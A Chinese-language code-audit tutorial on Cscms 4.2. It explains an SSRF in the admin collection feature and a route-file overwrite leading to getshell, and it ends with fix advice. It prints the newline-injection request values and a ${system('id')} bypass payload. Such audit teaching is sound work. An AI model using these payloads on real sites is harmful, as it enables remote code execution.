Cscms代码审计教学文档<\/h1>

1. 环境准备<\/h2>

CMS版本<\/strong>: Cscms 4.2<\/li>
PHP版本<\/strong>: 7.0.9（建议使用此版本进行复现）<\/li>

审计工具<\/strong>: PhpStorm（用于代码分析）、BurpSuite（用于抓包和修改请求）<\/li> <\/ul>
2. 漏洞概述<\/h2>
本次审计发现两个高危漏洞：<\/p>

SSRF漏洞<\/strong>（服务器端请求伪造）<\/li>
文件覆盖导致Getshell漏洞<\/strong><\/li> <\/ol>
3. SSRF漏洞分析<\/h2>
3.1 漏洞位置<\/h3>

功能点<\/strong>: 后台工具栏的采集功能<\/li>
文件路径<\/strong>: upload\/plugins\/sys\/admin\/Collect.php<\/code><\/li>
方法<\/strong>: Collect->add<\/code><\/li> <\/ul> 3.2 漏洞触发流程<\/h3> 请求中的cjurl<\/code>参数未做安全处理<\/li> 参数被传入$this->caiji->str<\/code>方法<\/li> 通过htmlall<\/code>方法使用curl请求URL<\/li> <\/ol> 3.3 代码分析<\/h3> \/\/ Collect.php#Collect->add <\/span><\/span><\/span><\/span>$cjurl =<\/span> $_POST['cjurl'<\/span>]; \/\/ 未过滤的用户输入 <\/span><\/span><\/span><\/span>$this-><\/span>caiji<\/span>-><\/span>str<\/span>($cjurl); \/\/ 传入危险方法 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 查找str方法定义（在PhpStorm中按两次Shift键搜索） <\/span><\/span><\/span>\/\/ str方法内部调用htmlall方法 <\/span><\/span><\/span><\/span>function<\/span> str<\/span>($url) { <\/span><\/span> $this-><\/span>htmlall<\/span>($url); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ htmlall方法使用curl请求 <\/span><\/span><\/span><\/span>function<\/span> htmlall<\/span>($url) { <\/span><\/span> \/\/ 使用curl请求$url，存在SSRF风险 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>3.4 复现步骤<\/h3> 在本地使用Python3开启HTTP服务：python3 -m http.server 8000<\/code><\/li> 访问后台采集功能<\/li> 在采集URL处输入http:\/\/127.0.0.1:8000<\/code><\/li> 观察本地服务收到请求，证明SSRF存在<\/li> <\/ol> 3.5 影响范围<\/h3> 所有调用$this->caiji->str<\/code>方法的地方都存在SSRF漏洞<\/p> 4. 文件覆盖导致Getshell漏洞<\/h2> 4.1 漏洞位置<\/h3> 敏感函数<\/strong>: write_file<\/code>（文件写入函数）<\/li> 文件路径<\/strong>: upload\/cscms\/app\/helpers\/common_helper.php<\/code><\/li> <\/ul> 4.2 漏洞触发流程<\/h3> 查找调用write_file<\/code>的位置（PhpStorm中Ctrl+Shift+F搜索）<\/li> 发现upload\/plugins\/sys\/admin\/Plugins.php#Plugins->_route_file<\/code>调用此函数<\/li> $note[$key]['name']<\/code>和$note[$key]['url']<\/code>以字符串方式拼接到文件内容<\/li> 可通过换行符绕过注释限制<\/li> <\/ol> 4.3 关键代码分析<\/h3> \/\/ common_helper.php <\/span><\/span><\/span><\/span>function<\/span> write_file<\/span>($file, $content) { <\/span><\/span> \/\/ 文件写入操作 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ Plugins.php#_route_file <\/span><\/span><\/span><\/span>foreach<\/span>($note as<\/span> $key=><\/span>$val) { <\/span><\/span> $data .=<\/span> "\/\/"<\/span>.<\/span>$note[$key]['name'<\/span>].<\/span>"<\/span>\n<\/span>"<\/span>; <\/span><\/span> $data .=<\/span> "<\/span>\$<\/span>route['"<\/span>.<\/span>$key.<\/span>"'] = '"<\/span>.<\/span>$note[$key]['url'<\/span>].<\/span>"';<\/span>\n\n<\/span>"<\/span>; <\/span><\/span>} <\/span><\/span>write_file<\/span>($file, $data); \/\/ 写入文件 <\/span><\/span><\/span><\/code><\/pre>4.4 复现步骤<\/h3> 使用BurpSuite抓取请求包<\/li> 修改请求包内容，插入换行符和恶意代码： name=%0aphpinfo();\/* url=*\/%0a\/\/ <\/code><\/pre> <\/li> 文件将写入到upload\/cscms\/config\/dance\/rewrite.php<\/code><\/li> 访问个人中心的音乐页面触发代码执行<\/li> <\/ol> 4.5 绕过限制技巧<\/h3> 发现eval<\/code>、shell_exec<\/code>等函数被转义<\/li> assert<\/code>未被转义，但在PHP7+有限制<\/li> 最终利用PHP动态特性实现RCE： $<\/span>{system<\/span>('id'<\/span>)}; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 代码审计方法论总结<\/h2> 5.1 审计方法<\/h3> 功能点定向审计<\/strong>：<\/p> 针对特定功能（如采集功能）进行深入分析<\/li> 根据经验判断常见漏洞位置<\/li> <\/ul> <\/li> 敏感函数回溯<\/strong>：<\/p> 从危险函数（如文件操作、命令执行等）回溯参数来源<\/li> 分析参数是否可控<\/li> <\/ul> <\/li> 通读全文代码<\/strong>（本次未使用）：<\/p> 全面阅读代码，发现潜在问题<\/li> <\/ul> <\/li> <\/ol> 5.2 PhpStorm审计技巧<\/h3> 快速定位方法定义<\/strong>：<\/p> 双击Shift键全局搜索<\/li> Ctrl+鼠标左键跳转到定义<\/li> <\/ul> <\/li> 全局搜索调用关系<\/strong>：<\/p> Ctrl+Shift+F全文搜索<\/li> 分析函数调用链<\/li> <\/ul> <\/li> 代码结构分析<\/strong>：<\/p> 使用Structure面板查看类和方法结构<\/li> 利用Find Usages分析变量使用情况<\/li> <\/ul> <\/li> <\/ol> 6. 漏洞修复建议<\/h2> 6.1 SSRF修复<\/h3> 对采集URL进行严格过滤<\/li> 限制访问内网IP和特殊协议<\/li> 使用白名单机制限制可采集的域名<\/li> <\/ol> 6.2 文件覆盖修复<\/h3> 对写入内容进行严格过滤<\/li> 禁止换行符等特殊字符<\/li> 对PHP代码进行转义处理<\/li> 限制文件写入权限和目录<\/li> <\/ol> 7. 总结<\/h2> 本次审计展示了从功能点和敏感函数入手的两种代码审计方法，成功发现SSRF和文件覆盖Getshell两个高危漏洞。通过PhpStorm的高效搜索和分析功能，大大提高了审计效率。最后利用PHP动态特性绕过过滤实现RCE，展示了漏洞利用的创造性思维。<\/p>